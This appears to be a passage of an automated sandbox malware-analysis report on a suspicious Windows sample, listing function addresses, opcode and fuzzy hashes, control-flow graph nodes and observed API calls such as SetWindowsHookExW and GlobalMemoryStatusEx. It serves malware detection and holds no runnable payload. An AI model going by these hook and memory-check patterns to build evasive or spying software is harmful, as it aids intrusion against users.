                                                                    control_flow_graph 114 2e7afd8-2e7b018 115 2e7b020-2e7b04b GetModuleHandleW 114->115 116 2e7b01a-2e7b01d 114->116 117 2e7b054-2e7b068 115->117 118 2e7b04d-2e7b053 115->118 116->115 118->117
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02E7B03E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: c65f04b0059bcb1eae999504f8fc9cf656cf3bd7bc0d62f3319bd6ac2f129001
                                                                    • Instruction ID: 16072f66fa15fd33796372574a243f22f460dc87fbc8afb8b83dc6cf1ea82a57
                                                                    • Opcode Fuzzy Hash: c65f04b0059bcb1eae999504f8fc9cf656cf3bd7bc0d62f3319bd6ac2f129001
                                                                    • Instruction Fuzzy Hash: 4A11FDB6800649CBDB10CF9AC544BDEFBF4BB88328F10845AD529A7200D3B9A545CFA1
                                                                    Function 0124D4C4 Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156315443.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_124d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 771faf049aa774dcdf6afb51756887b8e3d2aec28cc5df597df0b295de29dd0d
                                                                    • Instruction ID: 0b48a9a1bbeb79a99ee79ceb1c1790f63deeca48e2db4e9fa9356614fdd071b3
                                                                    • Opcode Fuzzy Hash: 771faf049aa774dcdf6afb51756887b8e3d2aec28cc5df597df0b295de29dd0d
                                                                    • Instruction Fuzzy Hash: 59214572610248EFDB09DF54E9C0B2ABF61FB98318F20C16DEA090B256C776D416CAE1
                                                                    Function 0124D3D8 Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156315443.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_124d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 603b00d4a2f92c4010efca2fed1e8c5cda1f8839f63df3273b0d9cb52eae4108
                                                                    • Instruction ID: fb90da1f6d05090d508ac0df78f2686abebc4dfcb2a9fa40a1f6bf7f21b04112
                                                                    • Opcode Fuzzy Hash: 603b00d4a2f92c4010efca2fed1e8c5cda1f8839f63df3273b0d9cb52eae4108
                                                                    • Instruction Fuzzy Hash: 4B216A76510208DFDB09DF54D9C0B66BF65FB94324F20C16CEA0A0B257C37AE456CBA1
                                                                    Function 0126D1D4 Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156386437.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_126d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 184e346be0e6e9c45a26855025576102009fdc0bf8b14de6003119d44a72e317
                                                                    • Instruction ID: ff90db1a7ab7d037585bf875c9390809bd8e26dc55cf78ad67d15f3789ddabe8
                                                                    • Opcode Fuzzy Hash: 184e346be0e6e9c45a26855025576102009fdc0bf8b14de6003119d44a72e317
                                                                    • Instruction Fuzzy Hash: 5721797161430CEFDB05DF94C5C0B25BB69FB84324F20C56CD9894B293C376D486CA61
                                                                    Function 0126D01C Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156386437.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_126d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6896d035051827bdcd73699bb65fc583766a253e7f4e64584ac527baeebce6f7
                                                                    • Instruction ID: c6c1cde34c9e85f762fca401d62193350825502254cff71f791bae12e2e16290
                                                                    • Opcode Fuzzy Hash: 6896d035051827bdcd73699bb65fc583766a253e7f4e64584ac527baeebce6f7
                                                                    • Instruction Fuzzy Hash: 1521457521420CDFCB14DF54D5C0B26BB69FB84314F20C56DD98A0B292C377D487CAA1
                                                                    Function 0124D4BF Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156315443.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_124d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                    • Instruction ID: 518990d40ede8e5519da9da721531115432c218e07a6ce66393d1419e0bb3195
                                                                    • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                    • Instruction Fuzzy Hash: CC112676504284CFCB16CF54E5C0B16BF71FB94318F24C6A9D9090B257C33AD45ACBA1
                                                                    Function 0124D3D3 Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156315443.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_124d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                    • Instruction ID: c2115975d72402675f5b20633aed71bc88b2fa7679637ed3ae7e3951d155bf39
                                                                    • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                    • Instruction Fuzzy Hash: A11126B6404284CFCB06CF54D5C0B56BF71FB94324F24C2A9D9090B257C33AE456CBA1
                                                                    Function 0126D017 Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156386437.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_126d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                    • Instruction ID: dd9f6d10dd3d091b919494bd8f24a61c58299c8602d529120df7f452cbcaca8e
                                                                    • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                    • Instruction Fuzzy Hash: 1111BE75604288CFCB12CF54D5C4B15BB61FB84314F24C6A9D9494B696C33BD44ACBA1
                                                                    Function 0126D1CF Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156386437.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_126d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                    • Instruction ID: aab42ea892bd547d45022cb9ff1e972750d7d02d563ccd0c32a2db151629985c
                                                                    • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                    • Instruction Fuzzy Hash: F111BE75604288DFDB12CF54C5C0B15BB61FB84224F28C6A9D9494B297C33AD44ACB51

                                                                    Non-executed Functions

                                                                    Function 02E7D3A4 Relevance: .3, Instructions: 264COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7fd4a53a23944f7f8f885e1943bd02d478960b99d5d701be145b1d289013dcc6
                                                                    • Instruction ID: c760f5bb10846a31fc607a547f4b523c2857ded3360f0036466a7f8f8bc88ec7
                                                                    • Opcode Fuzzy Hash: 7fd4a53a23944f7f8f885e1943bd02d478960b99d5d701be145b1d289013dcc6
                                                                    • Instruction Fuzzy Hash: E6A16B36E50209CFCF15DFB4C84459EBBB2FF85304B25956AE902AB261DB71E916CB80

                                                                    Execution Graph

                                                                    Execution Coverage:13.6%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:205
                                                                    Total number of Limit Nodes:19
                                                                    execution_graph 34341 310a0c0 34342 310a0c1 34341->34342 34346 669ed19 34342->34346 34350 669ee30 34342->34350 34354 669ed28 34342->34354 34348 669ed28 34346->34348 34347 669ee58 34347->34342 34348->34347 34358 669eeaf 34348->34358 34352 669ee07 34350->34352 34351 669ee58 34351->34342 34352->34351 34353 669eeaf 3 API calls 34352->34353 34353->34352 34356 669ed29 34354->34356 34355 669ee58 34355->34342 34356->34355 34357 669eeaf 3 API calls 34356->34357 34357->34356 34359 669eec0 34358->34359 34363 669fb29 34359->34363 34368 669fb38 34359->34368 34360 669efc6 34364 669fb38 34363->34364 34373 58b4228 34364->34373 34378 58b4238 34364->34378 34365 669fdea 34365->34360 34369 669fb39 34368->34369 34371 58b4228 3 API calls 34369->34371 34372 58b4238 3 API calls 34369->34372 34370 669fdea 34370->34360 34371->34370 34372->34370 34374 58b4238 34373->34374 34383 58b4428 34374->34383 34388 58b4438 34374->34388 34375 58b42be 34375->34365 34379 58b4239 34378->34379 34381 58b4428 3 API calls 34379->34381 34382 58b4438 3 API calls 34379->34382 34380 58b42be 34380->34365 34381->34380 34382->34380 34384 58b4438 34383->34384 34392 58b4460 34384->34392 34400 58b4470 34384->34400 34385 58b4446 34385->34375 34390 58b4460 2 API calls 34388->34390 34391 58b4470 2 API calls 34388->34391 34389 58b4446 34389->34375 34390->34389 34391->34389 34393 58b4470 34392->34393 34394 58b447d 34393->34394 34408 58b3bb8 34393->34408 34394->34385 34396 58b44c6 34396->34385 34398 58b458e GlobalMemoryStatusEx 34399 58b45be 34398->34399 34399->34385 34401 58b447d 34400->34401 34402 58b44a5 34400->34402 34401->34385 34403 58b3bb8 GlobalMemoryStatusEx 34402->34403 34405 58b44c2 34403->34405 34404 58b44c6 34404->34385 34405->34404 34406 58b458e GlobalMemoryStatusEx 34405->34406 34407 58b45be 34406->34407 34407->34385 34409 58b4548 GlobalMemoryStatusEx 34408->34409 34411 58b44c2 34409->34411 34411->34396 34411->34398 34412 310e4a0 34413 310e4e6 GetCurrentProcess 34412->34413 34415 310e531 34413->34415 34416 310e538 GetCurrentThread 34413->34416 34415->34416 34417 310e575 GetCurrentProcess 34416->34417 34418 310e56e 34416->34418 34419 310e5ab 34417->34419 34418->34417 34423 310e680 34419->34423 34421 310e604 34426 310e16c 34423->34426 34427 310e6e8 DuplicateHandle 34426->34427 34428 310e5d3 GetCurrentThreadId 34427->34428 34428->34421 34429 31077e8 34433 31077f7 34429->34433 34430 3107802 34433->34430 34434 310bf08 34433->34434 34438 310bf18 34433->34438 34435 310bf27 34434->34435 34442 310b5e4 34435->34442 34439 310bf27 34438->34439 34440 310b5e4 4 API calls 34439->34440 34441 310bf48 34440->34441 34441->34430 34443 310b5ef 34442->34443 34446 310e23c 34443->34446 34445 310ed4e 34445->34445 34447 310e247 34446->34447 34448 310f474 34447->34448 34449 310f4cf 34447->34449 34454 6691191 34447->34454 34458 66911a0 34447->34458 34448->34449 34462 669e278 34448->34462 34467 669e26a 34448->34467 34449->34445 34455 669119d 34454->34455 34456 66911e5 34455->34456 34472 6691341 34455->34472 34456->34448 34459 66911c1 34458->34459 34460 66911e5 34459->34460 34461 6691341 GetModuleHandleW 34459->34461 34460->34448 34461->34460 34465 669e2dd 34462->34465 34463 669ce98 PeekMessageW 34463->34465 34464 669e740 WaitMessage 34464->34465 34465->34463 34465->34464 34466 669e32a 34465->34466 34466->34449 34470 669e278 34467->34470 34468 669ce98 PeekMessageW 34468->34470 34469 669e740 WaitMessage 34469->34470 34470->34468 34470->34469 34471 669e32a 34470->34471 34471->34449 34473 669135d 34472->34473 34474 6691396 34473->34474 34477 66913b8 34473->34477 34483 66913b5 34473->34483 34474->34456 34478 66913e0 34477->34478 34479 6691408 34478->34479 34489 6691468 34478->34489 34494 66914b4 34478->34494 34500 6691450 34478->34500 34479->34479 34484 66913e0 34483->34484 34485 6691408 34484->34485 34486 6691468 GetModuleHandleW 34484->34486 34487 6691450 GetModuleHandleW 34484->34487 34488 66914b4 GetModuleHandleW 34484->34488 34486->34485 34487->34485 34488->34485 34490 6691472 34489->34490 34505 6696868 34490->34505 34510 6696880 34490->34510 34491 66914b1 34491->34479 34495 66914c2 34494->34495 34496 6691472 34494->34496 34498 6696868 GetModuleHandleW 34496->34498 34499 6696880 GetModuleHandleW 34496->34499 34497 66914b1 34497->34479 34498->34497 34499->34497 34501 6691468 34500->34501 34503 6696868 GetModuleHandleW 34501->34503 34504 6696880 GetModuleHandleW 34501->34504 34502 66914b1 34502->34479 34503->34502 34504->34502 34507 6696880 34505->34507 34506 66968bd 34506->34491 34507->34506 34516 6696ae8 34507->34516 34520 6696af8 34507->34520 34512 66968b1 34510->34512 34513 66968fd 34510->34513 34511 66968bd 34511->34491 34512->34511 34514 6696ae8 GetModuleHandleW 34512->34514 34515 6696af8 GetModuleHandleW 34512->34515 34513->34491 34514->34513 34515->34513 34517 6696af8 34516->34517 34523 6696b38 34517->34523 34518 6696b02 34518->34506 34522 6696b38 GetModuleHandleW 34520->34522 34521 6696b02 34521->34506 34522->34521 34524 6696b7c 34523->34524 34525 6696b59 34523->34525 34524->34518 34525->34524 34526 6696d80 GetModuleHandleW 34525->34526 34527 6696dad 34526->34527 34527->34518 34528 3107a28 34529 3107a6c SetWindowsHookExW 34528->34529 34531 3107ab2 34529->34531 34532 6699150 34533 66991b8 CreateWindowExW 34532->34533 34535 6699274 34533->34535 34278 177d0fc 34279 177d114 34278->34279 34280 177d16e 34279->34280 34285 669a059 34279->34285 34294 66992f7 34279->34294 34298 6697274 34279->34298 34307 6699308 34279->34307 34286 669a0b9 34285->34286 34287 669a05e 34285->34287 34311 669a2bc 34286->34311 34317 669a1f0 34286->34317 34322 669a1e0 34286->34322 34287->34286 34288 669a0c9 34287->34288 34290 669a0c7 34288->34290 34327 669739c 34288->34327 34295 669932e 34294->34295 34296 6697274 CallWindowProcW 34295->34296 34297 669934f 34296->34297 34297->34280 34299 669727f 34298->34299 34300 669a0c9 34299->34300 34302 669a0b9 34299->34302 34301 669739c CallWindowProcW 34300->34301 34303 669a0c7 34300->34303 34301->34303 34304 669a2bc CallWindowProcW 34302->34304 34305 669a1e0 CallWindowProcW 34302->34305 34306 669a1f0 CallWindowProcW 34302->34306 34304->34303 34305->34303 34306->34303 34308 669932e 34307->34308 34309 6697274 CallWindowProcW 34308->34309 34310 669934f 34309->34310 34310->34280 34312 669a27a 34311->34312 34313 669a2ca 34311->34313 34331 669a2a8 34312->34331 34334 669a297 34312->34334 34314 669a290 34314->34290 34318 669a204 34317->34318 34320 669a2a8 CallWindowProcW 34318->34320 34321 669a297 CallWindowProcW 34318->34321 34319 669a290 34319->34290 34320->34319 34321->34319 34324 669a1f0 34322->34324 34323 669a290 34323->34290 34325 669a2a8 CallWindowProcW 34324->34325 34326 669a297 CallWindowProcW 34324->34326 34325->34323 34326->34323 34328 66973a7 34327->34328 34329 669b7aa CallWindowProcW 34328->34329 34330 669b759 34328->34330 34329->34330 34330->34290 34332 669a2b9 34331->34332 34338 669b6e0 34331->34338 34332->34314 34335 669a2a8 34334->34335 34336 669a2b9 34335->34336 34337 669b6e0 CallWindowProcW 34335->34337 34336->34314 34337->34336 34339 669739c CallWindowProcW 34338->34339 34340 669b6fa 34339->34340 34340->34332

                                                                    Executed Functions

                                                                    Function 0669E278 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 639 669e278-669e2db 640 669e30a-669e328 639->640 641 669e2dd-669e307 639->641 646 669e32a-669e32c 640->646 647 669e331-669e368 640->647 641->640 649 669e7ea-669e7ff 646->649 651 669e799 647->651 652 669e36e-669e382 647->652 655 669e79e-669e7b4 651->655 653 669e3b1-669e3d0 652->653 654 669e384-669e3ae 652->654 661 669e3e8-669e3ea 653->661 662 669e3d2-669e3d8 653->662 654->653 655->649 666 669e409-669e412 661->666 667 669e3ec-669e404 661->667 664 669e3da 662->664 665 669e3dc-669e3de 662->665 664->661 665->661 668 669e41a-669e421 666->668 667->655 669 669e42b-669e432 668->669 670 669e423-669e429 668->670 672 669e43c 669->672 673 669e434-669e43a 669->673 671 669e43f-669e455 call 669ce98 670->671 675 669e45a-669e45c 671->675 672->671 673->671 676 669e5b1-669e5b5 675->676 677 669e462-669e469 675->677 678 669e5bb-669e5bf 676->678 679 669e784-669e797 676->679 677->651 680 669e46f-669e4ac 677->680 681 669e5d9-669e5e2 678->681 682 669e5c1-669e5d4 678->682 679->655 688 669e77a-669e77e 680->688 689 669e4b2-669e4b7 680->689 683 669e611-669e618 681->683 684 669e5e4-669e60e 681->684 682->655 686 669e61e-669e625 683->686 687 669e6b7-669e6cc 683->687 684->683 691 669e654-669e676 686->691 692 669e627-669e651 686->692 687->688 702 669e6d2-669e6d4 687->702 688->668 688->679 693 669e4e9-669e4fe call 669de7c 689->693 694 669e4b9-669e4c7 call 669de64 689->694 691->687 729 669e678-669e682 691->729 692->691 700 669e503-669e507 693->700 694->693 704 669e4c9-669e4e7 call 669de70 694->704 705 669e509-669e51b call 669de88 700->705 706 669e578-669e585 700->706 707 669e721-669e73e call 669ce98 702->707 708 669e6d6-669e70f 702->708 704->700 733 669e55b-669e573 705->733 734 669e51d-669e54d 705->734 706->688 721 669e58b-669e595 call 669de98 706->721 707->688 720 669e740-669e76c WaitMessage 707->720 724 669e718-669e71f 708->724 725 669e711-669e717 708->725 726 669e76e 720->726 727 669e773 720->727 735 669e5a4-669e5ac call 669deb0 721->735 736 669e597-669e59f call 669dea4 721->736 724->688 725->724 726->727 727->688 740 669e69a-669e6b5 729->740 741 669e684-669e68a 729->741 733->655 743 669e54f 734->743 744 669e554 734->744 735->688 736->688 740->687 740->729 747 669e68c 741->747 748 669e68e-669e690 741->748 743->744 744->733 747->740 748->740
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 39259e5b95bb529422e402bf300dbb04c1932e11054cc982231469e27aab4ea1
                                                                    • Instruction ID: 0e425715515ab134e7f1702ca568e3b4ca04547746dbfcf5c527aba26f0bc573
                                                                    • Opcode Fuzzy Hash: 39259e5b95bb529422e402bf300dbb04c1932e11054cc982231469e27aab4ea1
                                                                    • Instruction Fuzzy Hash: 0DF13930A00209CFEF54DFA9C944B9DBBF5FF88314F148168E909AB3A5DB71A945CB91
                                                                    Function 0310E4A0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 0310E51E
                                                                    • GetCurrentThread.KERNEL32 ref: 0310E55B
                                                                    • GetCurrentProcess.KERNEL32 ref: 0310E598
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0310E5F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4572476188.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_3100000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 8d2b94dae577126e9fa7e87fda5b051e6fadc1123c384fe1307b03d924e316a4
                                                                    • Instruction ID: 1d3d7ebbd78a988ff1570d1bf3901ddc566a7bd9d8c6454157c988dc120d3f91
                                                                    • Opcode Fuzzy Hash: 8d2b94dae577126e9fa7e87fda5b051e6fadc1123c384fe1307b03d924e316a4
                                                                    • Instruction Fuzzy Hash: A45164B090074A8FDB54DFAAD548B9EBBF1FF88318F208459E409A7390DB74A944CF65
                                                                    Function 06696B38 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1208 6696b38-6696b57 1209 6696b59-6696b66 call 6695ae0 1208->1209 1210 6696b83-6696b87 1208->1210 1217 6696b68 1209->1217 1218 6696b7c 1209->1218 1211 6696b89-6696b93 1210->1211 1212 6696b9b-6696bdc 1210->1212 1211->1212 1219 6696be9-6696bf7 1212->1219 1220 6696bde-6696be6 1212->1220 1265 6696b6e call 6696dd1 1217->1265 1266 6696b6e call 6696de0 1217->1266 1218->1210 1222 6696bf9-6696bfe 1219->1222 1223 6696c1b-6696c1d 1219->1223 1220->1219 1221 6696b74-6696b76 1221->1218 1224 6696cb8-6696d78 1221->1224 1226 6696c09 1222->1226 1227 6696c00-6696c07 call 6695aec 1222->1227 1225 6696c20-6696c27 1223->1225 1258 6696d7a-6696d7d 1224->1258 1259 6696d80-6696dab GetModuleHandleW 1224->1259 1229 6696c29-6696c31 1225->1229 1230 6696c34-6696c3b 1225->1230 1228 6696c0b-6696c19 1226->1228 1227->1228 1228->1225 1229->1230 1232 6696c48-6696c51 1230->1232 1233 6696c3d-6696c45 1230->1233 1238 6696c5e-6696c63 1232->1238 1239 6696c53-6696c5b 1232->1239 1233->1232 1240 6696c81-6696c85 1238->1240 1241 6696c65-6696c6c 1238->1241 1239->1238 1263 6696c88 call 66970b1 1240->1263 1264 6696c88 call 66970c0 1240->1264 1241->1240 1243 6696c6e-6696c7e call 6693a4c call 6695afc 1241->1243 1243->1240 1244 6696c8b-6696c8e 1247 6696cb1-6696cb7 1244->1247 1248 6696c90-6696cae 1244->1248 1248->1247 1258->1259 1260 6696dad-6696db3 1259->1260 1261 6696db4-6696dc8 1259->1261 1260->1261 1263->1244 1264->1244 1265->1221 1266->1221
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06696D9E
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 4d040b5d4549aad6d54f38bfbe7e34b895919397285d5ea465d76cba5e8207ea
                                                                    • Instruction ID: ead9b0b07b576143bc7b419f1e7a95abb0c8dbb07cc2c788fc9d3740131a1b69
                                                                    • Opcode Fuzzy Hash: 4d040b5d4549aad6d54f38bfbe7e34b895919397285d5ea465d76cba5e8207ea
                                                                    • Instruction Fuzzy Hash: 28812770A00B058FEBA4DF29C44475ABBF5FF88204F00892DD89AD7B50D775E849CBA4
                                                                    Function 058B4470 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1267 58b4470-58b447b 1268 58b447d-58b44a4 call 58b3bac 1267->1268 1269 58b44a5-58b44c4 call 58b3bb8 1267->1269 1275 58b44ca-58b4529 1269->1275 1276 58b44c6-58b44c9 1269->1276 1283 58b452b-58b452e 1275->1283 1284 58b452f-58b45bc GlobalMemoryStatusEx 1275->1284 1288 58b45be-58b45c4 1284->1288 1289 58b45c5-58b45ed 1284->1289 1288->1289
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4586654532.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_58b0000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ee9576573855ecda9b0dd1e3398e6cb5e84f271177a223e75d70c453329bfa4d
                                                                    • Instruction ID: 5ede69a4eec9d7617097b1391bbbb55337a3b25b04aa8794bbc641c36ed8117f
                                                                    • Opcode Fuzzy Hash: ee9576573855ecda9b0dd1e3398e6cb5e84f271177a223e75d70c453329bfa4d
                                                                    • Instruction Fuzzy Hash: 98413132E043859FDB04CFA9D8007AEBBF6AFC8220F04856AD808E7351DBB49844CBD1
                                                                    Function 06699145 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1292 6699145-66991b6 1294 66991b8-66991be 1292->1294 1295 66991c1-66991c8 1292->1295 1294->1295 1296 66991ca-66991d0 1295->1296 1297 66991d3-669920b 1295->1297 1296->1297 1298 6699213-6699272 CreateWindowExW 1297->1298 1299 669927b-66992b3 1298->1299 1300 6699274-669927a 1298->1300 1304 66992c0 1299->1304 1305 66992b5-66992b8 1299->1305 1300->1299 1306 66992c1 1304->1306 1305->1304 1306->1306
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06699262
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 1bf5d2d296f73922c8f4849cc5f7bd296f0fabda0ed32f322149fb0299fab7b0
                                                                    • Instruction ID: e99f637770e6de628f27ff9d0315a4d95f774c0b91a5539988860dd0fe59f971
                                                                    • Opcode Fuzzy Hash: 1bf5d2d296f73922c8f4849cc5f7bd296f0fabda0ed32f322149fb0299fab7b0
                                                                    • Instruction Fuzzy Hash: 535190B1D113499FDF14CF9AC884ADEBBB5BF48310F24862EE819AB250D7759845CFA0
                                                                    Function 06699150 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1307 6699150-66991b6 1308 66991b8-66991be 1307->1308 1309 66991c1-66991c8 1307->1309 1308->1309 1310 66991ca-66991d0 1309->1310 1311 66991d3-6699272 CreateWindowExW 1309->1311 1310->1311 1313 669927b-66992b3 1311->1313 1314 6699274-669927a 1311->1314 1318 66992c0 1313->1318 1319 66992b5-66992b8 1313->1319 1314->1313 1320 66992c1 1318->1320 1319->1318 1320->1320
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06699262
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
